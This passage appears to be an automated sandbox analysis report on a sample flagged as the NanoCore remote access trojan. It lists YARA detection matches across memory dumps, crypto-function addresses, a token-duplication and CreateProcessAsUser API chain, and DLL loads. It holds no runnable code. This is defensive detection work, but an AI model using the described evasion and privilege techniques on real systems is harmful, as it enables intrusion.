Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown

Detected potential crypto function

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095848E	0_2_0095848E
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00966CDC	0_2_00966CDC
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00964088	0_2_00964088
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009600B7	0_2_009600B7
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009540FE	0_2_009540FE
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009751C9	0_2_009751C9
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00967153	0_2_00967153
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009662CA	0_2_009662CA
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009532F7	0_2_009532F7
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009643BF	0_2_009643BF
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095C426	0_2_0095C426
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0097D440	0_2_0097D440
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095F461	0_2_0095F461
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009677EF	0_2_009677EF
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0097D8EE	0_2_0097D8EE
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095286B	0_2_0095286B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095E9B7	0_2_0095E9B7
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009819F4	0_2_009819F4
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00963E0B	0_2_00963E0B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00974F9A	0_2_00974F9A
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095EFE2	0_2_0095EFE2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00278037	7_2_00278037
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00272007	7_2_00272007
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026E0BE	7_2_0026E0BE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0025E1A0	7_2_0025E1A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0025225D	7_2_0025225D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0028A28E	7_2_0028A28E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002722C2	7_2_002722C2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026C59E	7_2_0026C59E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002DC7A3	7_2_002DC7A3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0028E89F	7_2_0028E89F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C291A	7_2_002C291A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00286AFB	7_2_00286AFB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002B8B27	7_2_002B8B27
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0027CE30	7_2_0027CE30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00287169	7_2_00287169
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002E51D2	7_2_002E51D2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00259240	7_2_00259240
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00259499	7_2_00259499
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00271724	7_2_00271724
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00271A96	7_2_00271A96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00259B60	7_2_00259B60
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00277BAB	7_2_00277BAB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00271D40	7_2_00271D40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00277DDA	7_2_00277DDA

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002B1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

7_2_002B1A91

Tries to load missing DLLs

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: dxgidebug.dll	Jump to behavior

Uses 32bit PE files

Source: P05jmXYKpr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
